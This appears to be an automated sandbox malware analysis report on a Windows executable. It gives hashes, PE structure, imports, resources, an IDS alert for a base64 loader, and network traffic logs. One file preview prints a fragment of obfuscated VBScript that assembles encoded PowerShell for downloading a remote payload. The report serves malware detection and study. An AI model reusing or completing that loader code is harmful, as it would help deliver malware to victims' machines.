                                                                                                      SHA-256:2003C2D87C5641063FAF9402288CCD5AFDE73723C3BAA114F05DABB692EF603C
                                                                                                      SHA-512:4867E92A35DC7C17B9D814B06D0E61ED451A4ADC9B44839ED8DB9D3CD4A695F6CCC59B0497002F66FC2D0AFB87E6DF0F1FBDFA95D8B8CADDEDAEF6237ACD6D8A
                                                                                                      Malicious:false
                                                                                                      Preview: 'g..pbdbgpnodcA = rRegisggfgdsadfkjhgjg211 & ""..Call Ugsfisging("$so" & "digo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$D")..Call Ugsfisging("o$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQB")..kaahgdmc = TimeSerial(7,7,9)..Public Const neIjImodj = "krdkmmS"..chbjepih = "hffhfg" & LenB("Imaangod") & "hfg"..'kaAmpmm gkrabemi..pmaeSccA = TimeSerial(8,8,7)..Public Const Fdkpgmo = "ocbokkF"..kifdISkoh = "hffhfg" & LenB("dgcjmncpb") & "hfg"..'ibbadefd FdASodrr..Call Ugsfisging("y$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$")..mkAdhckhm = TimeSerial(9,7,9)..Public Const gidbbba = "knhodpebo"..Sbhkhnkjk = "hffhfg" & LenB("kmdmIfprn") & "hfg"..'mmbrdbF nbmcFfm..Fohbdkd = TimeSerial(8,7,7)..Public Const IFrjifm = "AdbScbhem"..fffIdkSg = "hffhfg" & LenB("IkhgAjek") & "hfg"..'aicAigkmb ogjdddek..Call Ugsfisging("N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bg")..Call Ugsfisging("Bs$G8$Y

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10gphrwu.oh5.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_50u4q4dw.krp.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djdbg232.2ik.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwjmcyp4.eqh.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gltkmoh0.b1d.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojxp3lrj.mae.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                      Entropy (8bit):6.853102909659854
                                                                                                      TrID:
                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:GdGXG0bnxH.exe
                                                                                                      File size:163'840 bytes
                                                                                                      MD5:8970eef61ba5b0d180b01242796bad53
                                                                                                      SHA1:b321407f1f5ce589c99060e413e8edd676f4301c
                                                                                                      SHA256:14fc6009715e1f4627e3fd9cefb81c27d55f766a210c651b6a0491b075f46189
                                                                                                      SHA512:1da4273083518e8c870aebcbf0dda55defce12effbd7485bd36dc04075fc7d9fbe66b548b41e2328a7055be0921750537e5e84c841b0219ff9535d16f35a888e
                                                                                                      SSDEEP:3072:VahKyd2n31t5GWp1icKAArDZz4N9GhbkrNEk1rkhE1T:VahOBp0yN90QEOkyN
                                                                                                      TLSH:B8F38C0A63E420A6E4BA577498F302935A31BCB15B7892FF23C5D57E1E236D0A532F17
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

                                                                                                      File Icon

                                                                                                      Icon Hash:3b6120282c4c5a1f

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x140008200
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x140000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:10
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:10
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:10
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      dec eax
                                                                                                      sub esp, 28h
                                                                                                      call 00007F8AF51EEA80h
                                                                                                      dec eax
                                                                                                      add esp, 28h
                                                                                                      jmp 00007F8AF51EE32Bh
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+08h], ebx
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+10h], edi
                                                                                                      inc ecx
                                                                                                      push esi
                                                                                                      dec eax
                                                                                                      sub esp, 000000B0h
                                                                                                      and dword ptr [esp+20h], 00000000h
                                                                                                      dec eax
                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                      call dword ptr [000011CDh]
                                                                                                      nop
                                                                                                      dec eax
                                                                                                      mov eax, dword ptr [00000030h]
                                                                                                      dec eax
                                                                                                      mov ebx, dword ptr [eax+08h]
                                                                                                      xor edi, edi
                                                                                                      xor eax, eax
                                                                                                      dec eax
                                                                                                      cmpxchg dword ptr [00004922h], ebx
                                                                                                      je 00007F8AF51EE32Ch
                                                                                                      dec eax
                                                                                                      cmp eax, ebx
                                                                                                      jne 00007F8AF51EE33Ch
                                                                                                      mov edi, 00000001h
                                                                                                      mov eax, dword ptr [00004918h]
                                                                                                      cmp eax, 01h
                                                                                                      jne 00007F8AF51EE339h
                                                                                                      lea ecx, dword ptr [eax+1Eh]
                                                                                                      call 00007F8AF51EE913h
                                                                                                      jmp 00007F8AF51EE39Ch
                                                                                                      mov ecx, 000003E8h
                                                                                                      call dword ptr [0000117Eh]
                                                                                                      jmp 00007F8AF51EE2E9h
                                                                                                      mov eax, dword ptr [000048F6h]
                                                                                                      test eax, eax
                                                                                                      jne 00007F8AF51EE37Bh
                                                                                                      mov dword ptr [000048E8h], 00000001h
                                                                                                      dec esp
                                                                                                      lea esi, dword ptr [000013E9h]
                                                                                                      dec eax
                                                                                                      lea ebx, dword ptr [000013CAh]
                                                                                                      dec eax
                                                                                                      mov dword ptr [esp+30h], ebx
                                                                                                      mov dword ptr [esp+24h], eax
                                                                                                      dec ecx
                                                                                                      cmp ebx, esi
                                                                                                      jnc 00007F8AF51EE347h
                                                                                                      test eax, eax
                                                                                                      jne 00007F8AF51EE347h
                                                                                                      dec eax
                                                                                                      cmp dword ptr [ebx], 00000000h
                                                                                                      je 00007F8AF51EE332h
                                                                                                      dec eax
                                                                                                      mov eax, dword ptr [ebx]
                                                                                                      dec eax
                                                                                                      mov ecx, dword ptr [00001388h]

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1ce54.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000x20.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0xf0000x1d0000x1d000f9285d793255b19603f1fb043f493701False0.7388452990301724data7.0506300064705325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x2c0000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                                                      RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                                                      RT_ICON0x12e7c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                                                      RT_ICON0x131640x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                                                      RT_ICON0x1334c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                                      RT_ICON0x134740xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                                                      RT_ICON0x1431c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                                                      RT_ICON0x14bc40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                                                      RT_ICON0x1528c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                                                      RT_ICON0x157f40xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                                                      RT_ICON0x231c80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                                      RT_ICON0x257700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                                      RT_ICON0x268180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                                                      RT_ICON0x271a00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                                                      RT_DIALOG0x276080x2f2dataEnglishUnited States0.4389920424403183
                                                                                                      RT_DIALOG0x278fc0x1b0dataEnglishUnited States0.5625
                                                                                                      RT_DIALOG0x27aac0x166dataEnglishUnited States0.5223463687150838
                                                                                                      RT_DIALOG0x27c140x1c0dataEnglishUnited States0.5446428571428571
                                                                                                      RT_DIALOG0x27dd40x130dataEnglishUnited States0.5526315789473685
                                                                                                      RT_DIALOG0x27f040x120dataEnglishUnited States0.5763888888888888
                                                                                                      RT_STRING0x280240x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                                                                      RT_STRING0x280b00x520dataEnglishUnited States0.4032012195121951
                                                                                                      RT_STRING0x285d00x5ccdataEnglishUnited States0.36455525606469
                                                                                                      RT_STRING0x28b9c0x4b0dataEnglishUnited States0.385
                                                                                                      RT_STRING0x2904c0x44adataEnglishUnited States0.3970856102003643
                                                                                                      RT_STRING0x294980x3cedataEnglishUnited States0.36858316221765913
                                                                                                      RT_RCDATA0x298680x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                      RT_RCDATA0x298700x18b8Microsoft Cabinet archive data, Windows 2000/XP setup, 6328 bytes, 1 file, at 0x2c +A "675c87f6bfee1.vbs", ID 1356, number 1, 1 datablock, 0x1503 compressionEnglishUnited States1.0017383059418459
                                                                                                      RT_RCDATA0x2b1280x4dataEnglishUnited States3.0
                                                                                                      RT_RCDATA0x2b12c0x24GLS_BINARY_LSB_FIRSTEnglishUnited States0.6666666666666666
                                                                                                      RT_RCDATA0x2b1500x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                      RT_RCDATA0x2b1580x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                      RT_RCDATA0x2b1600x4dataEnglishUnited States3.0
                                                                                                      RT_RCDATA0x2b1640x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                      RT_RCDATA0x2b16c0x4dataEnglishUnited States3.0
                                                                                                      RT_RCDATA0x2b1700x1dASCII text, with no line terminatorsEnglishUnited States1.2758620689655173
                                                                                                      RT_RCDATA0x2b1900x4dataEnglishUnited States3.0
                                                                                                      RT_RCDATA0x2b1940x4dataEnglishUnited States3.0
                                                                                                      RT_RCDATA0x2b1980x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                      RT_RCDATA0x2b1a00x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                      RT_GROUP_ICON0x2b1a80xbcdataEnglishUnited States0.6117021276595744
                                                                                                      RT_VERSION0x2b2640x408dataEnglishUnited States0.42151162790697677
                                                                                                      RT_MANIFEST0x2b66c0x7e6XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.37734915924826906

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                      KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
                                                                                                      GDI32.dllGetDeviceCaps
                                                                                                      USER32.dllShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
                                                                                                      msvcrt.dll?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
                                                                                                      COMCTL32.dll
                                                                                                      Cabinet.dll
                                                                                                      VERSION.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Suricata IDS Alerts

                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-16T15:36:24.556728+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21185.199.109.133443192.168.2.749701TCP

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 16, 2024 15:36:13.065045118 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:13.065129042 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:13.065462112 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:13.072426081 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:13.072459936 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:14.537013054 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:14.538163900 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:14.541297913 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:14.541305065 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:14.541790009 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:14.552397966 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:14.595375061 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:15.226366997 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:15.226389885 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:15.226449013 CET44349700185.166.143.50192.168.2.7
                                                                                                      Dec 16, 2024 15:36:15.226602077 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:15.226602077 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:15.226602077 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:15.234255075 CET49700443192.168.2.7185.166.143.50
                                                                                                      Dec 16, 2024 15:36:15.412333012 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:15.412394047 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:15.412467003 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:15.413225889 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:15.413247108 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:16.651689053 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:16.651835918 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:16.654642105 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:16.654675007 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:16.654966116 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:16.657066107 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:16.703341961 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.147481918 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.147804976 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.147835016 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.147893906 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.147931099 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.147979975 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.149214029 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.157883883 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.157973051 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.158023119 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.166038990 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.166121960 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.166141987 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.174472094 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.174551964 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.174568892 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.225207090 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.267631054 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.318933010 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.318999052 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.345529079 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.345612049 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.345633984 CET49701443192.168.2.7185.199.109.133
                                                                                                      Dec 16, 2024 15:36:17.345648050 CET44349701185.199.109.133192.168.2.7
                                                                                                      Dec 16, 2024 15:36:17.345695019 CET49701443192.168.2.7185.199.109.133
